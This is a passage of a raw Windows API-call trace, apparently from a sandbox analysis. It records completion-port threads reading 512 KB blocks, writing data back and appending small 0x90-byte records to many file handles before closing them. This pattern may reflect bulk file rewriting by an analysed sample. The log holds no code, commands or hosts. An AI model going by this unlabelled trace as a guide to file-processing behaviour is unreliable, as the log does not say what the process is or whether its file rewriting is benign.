lpOverlapped=0x48b0020) returned 1 [0150.783] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.783] WriteFile (in: hFile=0x368, lpBuffer=0x41f0124, nNumberOfBytesToWrite=0x93dd, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x41f0020) returned 0x0 [0150.789] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.789] WriteFile (in: hFile=0x640, lpBuffer=0x4670124, nNumberOfBytesToWrite=0xb2cb, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4670020 | out: lpBuffer=0x4670124, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4670020) returned 0x0 [0150.793] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.794] WriteFile (in: hFile=0x648, lpBuffer=0x48b0124*, nNumberOfBytesToWrite=0xbd47, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x48b0020 | out: lpBuffer=0x48b0124*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x48b0020) returned 1 [0150.814] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.814] ReadFile (in: hFile=0x640, lpBuffer=0x4670124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x4670020 | out: lpBuffer=0x4670124, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x4670020) returned 0x0 [0150.814] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 0 [0150.814] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x41f0020) returned 1 [0150.814] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.814] ReadFile (in: hFile=0x618, lpBuffer=0x4790124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x4790020 | out: lpBuffer=0x4790124, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x4790020) returned 0x0 [0150.814] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.814] ReadFile (in: hFile=0x648, lpBuffer=0x48b0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x48b0020 | out: lpBuffer=0x48b0124, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x48b0020) returned 0x0 [0150.814] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 0 [0150.814] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4670020) returned 1 [0150.814] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.814] WriteFile (in: hFile=0x368, lpBuffer=0x41f0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0094*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x41f0020) returned 1 [0150.821] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.821] WriteFile (in: hFile=0x648, lpBuffer=0x48b0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x48b0020 | out: lpBuffer=0x48b0094*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x48b0020) returned 1 [0150.833] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.843] CloseHandle (hObject=0x648) returned 1 [0150.852] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x48b0020) returned 1 [0150.853] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0151.095] ReadFile (in: hFile=0x680, lpBuffer=0x4700124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x4700020 | out: lpBuffer=0x4700124*, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x4700020) returned 1 [0151.096] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0151.098] CloseHandle (hObject=0x670) returned 1 [0151.103] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2f30020) returned 1 [0151.103] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0155.512] ReadFile (in: hFile=0x658, lpBuffer=0x4700124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x4700020 | out: lpBuffer=0x4700124*, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x4700020) returned 1 [0155.512] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0155.514] ReadFile (in: hFile=0x670, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x2f30020) returned 0x0 [0155.514] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0155.514] WriteFile (in: hFile=0x680, lpBuffer=0x2880094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x2880020 | out: lpBuffer=0x2880094*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x2880020) returned 1 [0155.517] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0155.517] CloseHandle (hObject=0x680) returned 1 [0155.525] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2880020) returned 1 [0155.525] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0156.029] ReadFile (in: hFile=0x680, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x2f30020) returned 0x0 [0156.030] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0156.031] WriteFile (in: hFile=0x668, lpBuffer=0x4ca0124*, nNumberOfBytesToWrite=0x9685, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4ca0020 | out: lpBuffer=0x4ca0124*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4ca0020) returned 1 [0156.040] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 0 [0156.040] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4280020) returned 1 [0156.040] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 0 [0156.040] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4700020) returned 1 [0156.040] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0156.040] WriteFile (in: hFile=0x680, lpBuffer=0x2f30094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30094*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x2f30020) returned 1 [0156.044] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0156.045] WriteFile (in: hFile=0x2e0, lpBuffer=0x4a60094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4a60020 | out: lpBuffer=0x4a60094*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4a60020) returned 1 [0156.072] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0156.072] CloseHandle (hObject=0x670) returned 1 [0156.085] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4280020) returned 1 [0156.086] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 0 [0156.087] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4dc0020) returned 1 [0156.087] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0156.087] CloseHandle (hObject=0x618) returned 1 [0156.094] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4940020) returned 1 [0156.095] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0156.095] WriteFile (in: hFile=0x630, lpBuffer=0x4dc0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4dc0020 | out: lpBuffer=0x4dc0094*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4dc0020) returned 1 [0156.114] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 Thread: id = 133 os_tid = 0xbec [0151.400] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x490f920, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x490f920, FileInformation=0x44d8128) returned 0x0 Thread: id = 134 os_tid = 0x6b8 [0151.403] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fc38, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fc38, FileInformation=0x44d8128) returned 0xc000000d Thread: id = 135 os_tid = 0x30c [0151.406] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434f870, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434f870, FileInformation=0x44d8128) returned 0xc000000d Thread: id = 136 os_tid = 0xbfc [0151.408] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fde0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fde0, FileInformation=0x44d8128) returned 0xc000000d Thread: id = 137 os_tid = 0x3f8 [0151.410] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fc50, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fc50, FileInformation=0x44d8128) returned 0xc000000d Thread: id = 138 os_tid = 0x6cc [0151.412] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479ff28, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479ff28, FileInformation=0x44d8128) returned 0xc000000d Thread: id = 139 os_tid = 0x830 [0151.414] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47df868, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47df868, FileInformation=0x44d8128) returned 0xc000000d Thread: id = 140 os_tid = 0x75c [0151.416] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fdc0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432fdc0, FileInformation=0x44d8128) returned 0xc000000d Thread: id = 141 os_tid = 0x7f0 [0151.418] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fa90, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fa90, FileInformation=0x44d8128) returned 0xc000000d Thread: id = 142 os_tid = 0x710 [0151.420] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47efe60, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47efe60, FileInformation=0x44d8128) returned 0x0 Thread: id = 143 os_tid = 0x5d8 [0151.422] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efb40, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efb40, FileInformation=0x44d8128) returned 0xc0000003 Thread: id = 144 os_tid = 0xbe4 [0151.425] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436f9a8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436f9a8, FileInformation=0x44d8128) returned 0x0 Thread: id = 145 os_tid = 0x600 [0151.427] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x484fe88, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x484fe88, FileInformation=0x44d8128) returned 0x0 Thread: id = 146 os_tid = 0xbd0 [0151.430] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dfbe8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dfbe8, FileInformation=0x44d8128) returned 0x0 Thread: id = 147 os_tid = 0x158 [0151.432] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fd50, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fd50, FileInformation=0x44d8128) returned 0x0 Thread: id = 148 os_tid = 0xbd8 [0151.434] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efb40, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efb40, FileInformation=0x44d8128) returned 0xc0000003 Thread: id = 149 os_tid = 0xbe8 [0151.436] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfd68, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfd68, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 150 os_tid = 0xbdc [0151.438] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bf988, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bf988, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 151 os_tid = 0x5b4 [0151.440] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47fff38, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47fff38, FileInformation=0x44d8128) returned 0x0 Thread: id = 152 os_tid = 0x614 [0151.443] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x480fa08, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x480fa08, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 153 os_tid = 0x690 [0151.445] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48af888, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48af888, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 154 os_tid = 0xa68 [0151.447] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479f940, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479f940, FileInformation=0x44d8128) returned 0x0 Thread: id = 155 os_tid = 0x7d0 [0151.449] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x480fdf8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x480fdf8, FileInformation=0x44d8128) returned 0xc0000010 Thread: id = 156 os_tid = 0x7d8 [0151.451] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fbd0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fbd0, FileInformation=0x44d8128) returned 0xc0000010 Thread: id = 157 os_tid = 0x24c [0151.454] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48aff78, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48aff78, FileInformation=0x44d8128) returned 0xc0000010 Thread: id = 158 os_tid = 0x9f8 [0151.456] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47af850, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47af850, FileInformation=0x44d8128) returned 0xc0000010 Thread: id = 159 os_tid = 0x798 [0151.458] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434fa20, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434fa20, FileInformation=0x44d8128) returned 0xc0000003 Thread: id = 160 os_tid = 0xa3c [0151.460] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42ef9d8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42ef9d8, FileInformation=0x44d8128) returned 0x0 Thread: id = 161 os_tid = 0x8c0 [0151.462] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fbd0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fbd0, FileInformation=0x44d8128) returned 0xc0000003 Thread: id = 162 os_tid = 0x708 [0151.464] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fd10, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fd10, FileInformation=0x44d8128) returned 0x0 Thread: id = 163 os_tid = 0xa64 [0151.466] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x478f978, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x478f978, FileInformation=0x44d8128) returned 0x0 Thread: id = 164 os_tid = 0xa30 [0151.470] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x482fbe8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x482fbe8, FileInformation=0x44d8128) returned 0x0 Thread: id = 165 os_tid = 0x388 [0151.473] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fe68, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fe68, FileInformation=0x44d8128) returned 0x0 Thread: id = 166 os_tid = 0x760 [0151.475] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487f8d8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487f8d8, FileInformation=0x44d8128) returned 0xc0000003 Thread: id = 167 os_tid = 0xa54 [0151.477] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fbd0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fbd0, FileInformation=0x44d8128) returned 0x0 Thread: id = 168 os_tid = 0x738 [0151.479] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48afac8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48afac8, FileInformation=0x44d8128) returned 0x0 Thread: id = 169 os_tid = 0x488 [0151.482] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436ff48, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436ff48, FileInformation=0x44d8128) returned 0x0 Thread: id = 170 os_tid = 0x6dc [0151.484] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x435fa88, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x435fa88, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 171 os_tid = 0x7a0 [0151.486] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fda8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fda8, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 172 os_tid = 0x73c [0151.490] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430ff58, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430ff58, FileInformation=0x44d8128) returned 0x0 Thread: id = 173 os_tid = 0x1c0 [0151.493] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47cf8a8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47cf8a8, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 174 os_tid = 0x7c4 [0151.495] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x478fa38, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x478fa38, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 175 os_tid = 0x790 [0151.498] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434fae8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434fae8, FileInformation=0x44d8128) returned 0x0 Thread: id = 176 os_tid = 0x688 [0151.509] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efaa8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efaa8, FileInformation=0x44d8128) returned 0x0 Thread: id = 177 os_tid = 0x240 [0151.511] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434fc98, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434fc98, FileInformation=0x44d8128) returned 0xc0000003 Thread: id = 178 os_tid = 0x8e0 [0151.512] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483f860, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483f860, FileInformation=0x44d8128) returned 0xc0000003 Thread: id = 179 os_tid = 0x880 [0151.514] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47fff40, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47fff40, FileInformation=0x44d8128) returned 0x0 Thread: id = 180 os_tid = 0x8f0 [0151.515] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47df8e0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47df8e0, FileInformation=0x44d8128) returned 0xc0000003 Thread: id = 181 os_tid = 0xa18 [0151.517] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x484fb28, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x484fb28, FileInformation=0x44d8128) returned 0x0 Thread: id = 182 os_tid = 0x8a0 [0151.519] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fe70, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fe70, FileInformation=0x44d8128) returned 0x0 Thread: id = 183 os_tid = 0x870 [0151.520] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fee8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fee8, FileInformation=0x44d8128) returned 0xc0000003 Thread: id = 184 os_tid = 0x9a0 [0151.522] NtQueryInformationFile (in: FileHandle=0x680, 